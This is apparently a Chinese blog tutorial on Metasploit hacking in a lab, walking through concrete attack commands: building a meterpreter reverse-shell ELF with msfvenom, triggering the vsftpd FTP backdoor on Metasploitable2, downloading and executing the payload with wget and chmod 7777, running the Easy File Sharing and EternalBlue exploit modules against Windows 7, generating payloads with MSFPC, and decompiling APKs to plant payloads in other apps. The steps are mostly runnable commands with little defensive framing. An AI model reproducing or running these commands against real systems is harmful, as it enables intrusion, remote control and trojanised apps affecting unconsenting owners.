1、利用FTP漏洞并植入后门

实验靶机:Metasploitable2。

实践:

  1. 使用nmap扫描目标靶机
    1. nmap -sV xxx.xxx.xxx.xxx(目标ip)
  2. 生成linux系统后门
    1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx(主控端ip) LPORT=5555 -f elf -o /home/xxxx(用户名)/backdoor.elf
  3. 使用Apache服务在目标主机上下载后门
    1. sudo service apache2 start
    2. sudo cp home/xxxx(用户名)/backdoor.elf /var/www/html/
  4. 在主控端浏览器打开apache服务的ip地址,然后右键elf文件,选择Copy Link Location。
  5. 手工激活ftp后门。登录名:user:)。密码:pass
    1. 在主控端命令行输入:ftp xxx.xxx.xxx.xxx(靶机ip)。
    2. 输入登录名密码即可。
    3. 可以通过:nc xxx.xxx.xxx.xxx(靶机ip)。尝试判断是否启用成功。
  6. 然后在nc的命令行中执行下面的命令,这个地址就是你之前右键复制的那个地址。
    1. wget http://192.168.10.129/backdoor.elf
    2. 然后可以通过 cd / --> ls命令。看有没有这个文件。
  7. 然后,启用主控端。打开Metasploit,就跟之前一样。
    1. use exploit/multi/handler
    2. set payload linux/x86/meterpreter/reverse_tcp
    3. set lhost xxx.xxx.xxx.xxx(主控端ip)
    4. set lport 5555
    5. run
  8. 在目标主机上运行后门。以下命令在nc的命令行中操作:
    1. ./backdoor.elf。你会发现权限不足。
    2. chmod 7777 ./backdoor.elf。
    3. 然后再执行就可以了:./backdoor.elf。
  9. 然后,你就可以在meterpreter中为所欲为了。

2、常用攻击软件

由于Windows7使用了比较安全的机制,所以入侵win7远比入侵Windows xp要难得多。虽然系统本身很安全,但是我们不可能只安装一个系统,就什么都没有了,系统内我们还会安装很多软件,我们就可以从这些应用软件入手,去寻找他们的漏洞,借助这些软件做跳板,去入侵系统。

之前我们使用的是python脚本去攻击Easy File Sharing软件,使软件卡死。并成功在目标计算机上打开了计算器,这回我们使用Metasploit来攻击这个应用程序。

实验靶机:Windows7。

实践:

  1. search easyfilesharing。
  2. use exploit/windows/http/easyfilesharing_seh。
  3. set rhost xxx.xxx.xxx.xxx(目标ip)。
  4. set lport 6666。
  5. run。
  6. execute -f calc.exe。打开计算器。

3、攻击Windows7系统蓝屏

实验靶机:Windows7。

实践:

  1. search ms17-010。
  2. use exploit/windows/smb/ms17_010_eternalblue。
  3. set rhost xxx.xxx.xxx.xxx(目标ip)。
  4. set lport 6666。
  5. set payload windows/meterpreter/reverse_tcp。
  6. run。
  7. 然后Windows就蓝屏了。

4、漏洞利用工具集:MSFPC

生成payload的默认工具是MSFvenom,这是一个独立于Metasploit的payload生成器及编辑器。虽然它是一个非常强的payload生成神器,但是对于一个新手来说,可能难以在短时间内熟悉其操作。即使在进程最初的了解之后,生成一个基本的payload也需要输入相当多的内容。

MSFPC,或者说是MSFvenom Payload生成器,其实是一个基于MSFvenom的payload生成器,它简化了基本的有效载荷创建过程,用户使用MSFPC可以尽可能简单的创建Payload。

使用方法:

  1. 漏洞利用工具集 --> msf payload creator --> 打开他。
  2. sudo msfpc windows xxx.xxx.xxx.xxx(当前主机ip) 6666。
  3. 然后会生成这么多东西:

      

  4. 其实就是把我们之前通过手动配置的东西都自动生成了。包括可执行文件、命令脚本等。我们看下如何来使用这些东西
    1. sudo service apache2 start。
    2. 跟之前一样,把刚才生成的可执行文件复制到Apache目录下。这里不写了。
    3. msfconsole -q -r [上面生成的那个.rc文件地址]
    4. 查看session
    5. 使用session。
    6. 成功!

5、Payload 介绍

病毒通常会做一些有害的或者恶意的动作。在病毒代码中实现这个功能的部分叫做“有效载荷(Payload)”。Payload可以实现任何运行在受害者环境中的程序所能做的事情。并且能够执行动作包括破坏文件、删除文件、向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。

Payloads模块,也叫有效载荷或有效负载,也就是我们常说的shellcode。在MSF中为我们提供了大量的Payloads。我们可以再MSF中通过show payloads命令查看。

payloads模块的命名规则

操作系统/类型/模块名称:windows/shell/bind_tcp。

  1. shell_find_taf:在一个已建立的链接上创建一个shell
  2. shell_reverse_tcp:反向链接到攻击者主机并创建一个shell
  3. bind_tcp:监听一个tcp链接。
  4. reverse_tcp:反向建立tcp链接。
  5. add_user:创建一个新用户并添加到管理组。

payloads模块等级

等级代表好用程度,一般分为以下几个等级:

  1. normal:正常
  2. excellent:优秀
  3. great:极好
  4. good:好
  5. average:一般、平均
  6. manual:手动

查看payloads下的某个模块的详细信息

  1. info [模块名]

    • info windows/shell/bind_tcp

6、apk文件的反编译

1)什么是逆向工程?反编译?

就是将已有的APP程序,反向操作,方便我们查看里面的原始文件,因为我们平时拿到的APP程序都是经过加密处理的。

2)反编译有什么用?

可以用来分析APP,比如获取IP地址。将payload植入其他APP等等。

3)APK反编译软件——apktool

  1. 反编译apk文件
  2. apktool d xxx.apk
  3. 将反编译后的文件重新打包
  4. apktool b xxx.apk

黑客玩具入门——5、继续Metasploit的更多相关文章

  1. chapter1 渗透测试与metasploit

    网络对抗技术课程学习 chapter1 渗透测试与metasploit 一.读书笔记 二.渗透测试 通过模拟恶意攻击者的技术与方法进行攻击,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响 ...

  2. 【Sharing】如何成为一名黑客

    [声明]此文为转载,只为收藏. 从小到大听说了无数关于“电脑黑客”的故事,比如XXX入侵美国五角大楼,再比如前几年的“熊猫烧香”病毒,这些故事的主角都被我们的媒体称之为“黑客”.其实这些人,更大程度上 ...

  3. 黑客白皮书:如何成为一名黑客(附FAQ)

    内容一览 为什么会有这份文档? 什么是黑客? 黑客应有的态度 黑客的基本技能 黑客文化中的地位 黑客和书呆子(Nerd)的联系 风格的意义 其它资源 FAQ(常问问题解答)   作为Jargon Fi ...

  4. 接口自动化测试的"开胃小菜"---简单黑客攻击手段

    Web应用系统的小安全漏洞及相应的攻击方式 接口自动化测试的"开胃小菜" 1   写作目的 本文讲述一个简单的利用WebAPI来进行一次基本没有破坏力的“黑客”行为. 主要目的如下 ...

  5. 3000本IT书籍下载地址

    http://www.shouce.ren/post/d/id/112300    黑客攻防实战入门与提高.pdfhttp://www.shouce.ren/post/d/id/112299    黑 ...

  6. [转]据说200G网盘资料

    来源:HACK学习呀 2015cracer入侵入门到精通视频教程 点我查看 trf3 一笔√带过入侵教程 点我查看 ypan [复仇者]新手入门系列(7套) 点我查看 g1tb 菜鸟入门,做的确实不错 ...

  7. 200G网盘资源分享

    今日偶得大量网盘资源,遂写一博文以分享! 来源:HACK学习呀,微信公众号:HACK学习呀 文件名 链接 提取密码 2015cracer入侵入门到精通视频教程 点我查看 trf3 一笔√带过入侵教程 ...

  8. ApacheCN Kali Linux 译文集 20211020 更新

    Kali Linux 秘籍 中文版 第一章 安装和启动Kali 第二章 定制 Kali Linux 第三章 高级测试环境 第四章 信息收集 第五章 漏洞评估 第六章 漏洞利用 第七章 权限提升 第八章 ...

  9. Atitit。木马病毒原理机密与概论以及防御

    Atitit.木马病毒原理机密与概论以及防御 1. 定时截屏木马1 1.1. QQ聊天与微信聊天木马1 2. 文档木马1 3. 病毒木马的触发方式2 4. 远程木马2 5. 漏洞木马2 6. 病毒木马 ...

  10. Github Coding Developer Book For LiuGuiLinAndroid

    Github Coding Developer Book For LiuGuiLinAndroid 收集了这么多开源的PDF,也许会帮到一些人,现在里面的书籍还不是很多,我也在一点点的上传,才上传不到 ...

随机推荐

  1. 一起来自定义loader吧

    loader 在 webpack 编译中起到非常重要的作用,用于对模块的源代码进行转换,比如 css-loader 将 css 代码处理成字符串,style-loader 创建 style 标签将 c ...

  2. [golang]gin框架接收websocket通信

    前言 WebSocket是一种在单个TCP连接上进行全双工通信的协议.WebSocket让客户端和服务端之间的数据交换变得非常简单,且允许服务器主动向客户端推送数据,并且之后客户端和服务端所有的通信都 ...

  3. [kvm]创建虚拟机

    创建虚拟机示例 # 使用iso创建虚拟机 virt-install --virt-type kvm --os-type=linux --name temp_debian11 \ --memory 16 ...

  4. R2在全渠道业务线的落地

    随着业务的增长,系统的高频率迭代,质量保障工作迫切需要引入更加科学高效的测试方法来助力业务高质量的交付.长城项目一期测试中,全渠道质量团队引入技术平台部R2技术,极大的提升了项目交付的质量.因此,本文 ...

  5. 更专业省心的来了,你没必要研究UE4和Unity官方推流了!

    在当今互联网时代,所有的内容制作者都希望尽可能触达到更多的目标受众,那就需要全平台发布内容并且可以轻松跨平台分享,包括手机.平板电脑.个人电脑以及交互式屏幕,用户能畅快的获得高质量的体验.需求催生了一 ...

  6. Web安全漏洞解决方案

    1.已解密的登录请求 推理: AppScan 识别了不是通过 SSL 发送的登录请求. 测试请求和响应: 1.1.1 产生的原因 登录接口,前端传入的密码参数没有经过md5的加密就直接传给了后端 1. ...

  7. Unity UGUI的Image(图片)组件的介绍及使用

    UGUI的Image(图片)组件的介绍及使用 1. 什么是UGUI的Image(图片)组件? UGUI的Image(图片)组件是Unity引擎中的一种UI组件,用于显示2D图像.它提供了一种简单而灵活 ...

  8. Airtest遇到模拟器无法输入中文的情况该如何处理?

    此文章来源于项目官方公众号:"AirtestProject" 版权声明:允许转载,但转载必须保留原链接:请勿用作商业或者非法用途 1. 前言 最近有收到同学们的一些提问,使用Air ...

  9. Python 潮流周刊#17:Excel 终于支持 Python 了、Meta 重磅开源新项目、Mojo 新得 1 亿美元融资

    你好,我是猫哥.这里每周分享优质的 Python.AI 及通用技术内容,大部分为英文.标题取自其中两则分享,不代表全部内容都是该主题,特此声明. 本周刊由 Python猫 出品,精心筛选国内外的 25 ...

  10. react移动端上拉加载更多组件

    在开发移动端react项目中,遇到了上拉加载更多数据的分页功能,自己封装了一个组件,供大家参考,写的不好还请多多指教! import React, {Component} from 'react'; ...